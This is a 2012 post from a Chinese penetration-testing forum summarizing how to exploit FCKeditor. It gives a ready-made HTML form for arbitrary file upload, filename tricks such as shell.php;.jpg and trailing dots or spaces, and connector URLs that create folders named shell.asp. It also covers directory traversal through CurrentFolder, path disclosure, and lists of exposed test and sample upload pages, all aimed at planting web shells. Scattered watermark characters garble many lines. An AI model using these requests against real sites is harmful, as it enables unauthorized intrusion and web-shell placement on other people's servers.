中国网络渗透测试联盟

标题: FCKeditor漏洞利用总结 [打印本页]

作者: 荒村狂客    时间: 2012-9-5 20:23
标题: FCKeditor漏洞利用总结
Fckeditor漏洞利用总结

查看编辑器版本1 d- @, v% ^, r
FCKeditor/_whatsnew.html% S+ b* p* `) P: Y  E
—————————————————————————————————————————————————————————————

2. Version 2.2 版本
# t' `/ K% g5 l& J  ZApache+linux 环境下在上传文件后面加个.突破!测试通过。/ e, j3 N6 y# o( {& ^% b5 L2 Y; ~
—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。7 v; v# C/ w. U/ l
<form id="frmUpload" enctype="multipart/form-data"
* t3 e* ?7 D! d+ ^) aaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
$ x& y" t( T# G3 Q9 D' p<input type="file" name="NewFile" size="50"><br>4 @' P, K2 w& V7 s5 }+ k3 C" c0 ~
<input id="btnUpload" type="submit" value="Upload">
0 Q' K) ]. ]- E% c8 d</form># W) F5 O7 C3 J6 d. Q( R: B  p
—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
5 h9 x/ u  w6 b# g        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
# H# y* |! E& V) g3 M6 U; _; p    4.1:提交shell.php+空格绕过  g! ?) r3 ]; I
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。( q; o: n. Q; X. R2 b! N: Q( e
    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
0 h; a; W- ~& k—————————————————————————————————————————————————————————————

5. 突破建立文件夹
' H! s( S3 Q! }5 l& ]/ lFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=12447899756847 t  G4 Z% d: L; l
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
8 k( F. z, e$ i—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址
6 u; O6 C& u6 z6 YFCKeditor/editor/filemanager/browser/default/connectors/test.html
) U5 y  [* X6 x- bFCKeditor/editor/filemanager/upload/test.html2 {( f3 l% O  [, m7 G
FCKeditor/editor/filemanager/connectors/test.html
2 r1 q8 A3 R$ J) y1 u! N; a- fFCKeditor/editor/filemanager/connectors/uploadtest.html; t% `0 [! M2 b8 Z3 \# Q& I* H* z
—————————————————————————————————————————————————————————————
4 X0 e6 C( B4 p: g8 s* Q2 q8 y

7.常用上传地址
7 Y# M6 c% l9 e2 e) ]( I- A5 HFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
: j, T5 L1 H% B6 hFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
4 Z; y4 A. E) ^" R" A- WFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)2 V$ i. Q, d3 h0 d6 Y" g/ E
JSP 版:
" l! A! @; p- RFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp+ b2 E" ^1 g6 V7 b
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文( Y4 ]/ m9 w& c, \: o
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。( g- ]7 o; X7 v
—————————————————————————————————————————————————————————————

8.其他上传地址& Q  z; z) o9 X& S, ~) h
FCKeditor/_samples/default.html
. c+ I1 k- f: I& {5 q4 _6 A' lFCKeditor/_samples/asp/sample01.asp+ v6 o) Q2 _& ~0 Q3 L: ?& x
FCKeditor/_samples/asp/sample02.asp
" h& b8 I# q+ K5 Q& cFCKeditor/_samples/asp/sample03.asp
. b+ K. q. l* J' i$ O& ~FCKeditor/_samples/asp/sample04.asp
. o: h5 N: F4 n一般很多站点都已删除_samples 目录,可以试试。  L  T& V+ G# M6 _. O
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。: c% v- `/ M$ H3 _- ]% J( [
—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址! s* U$ B# z" ]  k1 ]6 s8 l( ?
Version 2.4.1 测试通过- R0 g+ x* D. R9 r4 G! P" q( V1 z
修改CurrentFolder 参数使用 ../../来进入不同的目录1 ~2 H0 e, k- y. f+ P5 T. A9 q1 X
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp- h+ G  m8 H( \4 q
根据返回的XML 信息可以查看网站所有的目录。0 S; X# x2 _3 {8 N) X& C2 {
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
, x! \  U8 _# f4 V) `$ u4 K也可以直接浏览盘符:
5 b2 v/ h2 H) zJSP 版本:. q# z4 m. ^: y) l6 u9 H. H
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F- }% b) F6 d! r, o) K& N
—————————————————————————————————————————————————————————————

10.爆路径漏洞2 |& W6 e) `" z
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp* ~! \! O* n3 h: w$ A: P
—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题
) @6 Z: p* S/ T/ f/ R        影响版本: FCKeditor x.x <= FCKeditor v2.4.37 n' X/ ^2 H2 \9 C, {% m
脆弱描述:
! w1 c2 t$ p' m3 Y; WFCKeditor v2.4.3 中File 类别默认拒绝上传类型:( N  \& g0 b8 z' Q) C
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
) x" y* v2 {5 |- y1 X! X7 XFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!! M  a# O3 u8 ~) f+ f" g* r2 T
        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
9 f: x* `  N9 H0 H8 W. y' b        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!


作者: admin    时间: 2012-9-8 22:43
[attach]41[/attach]




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2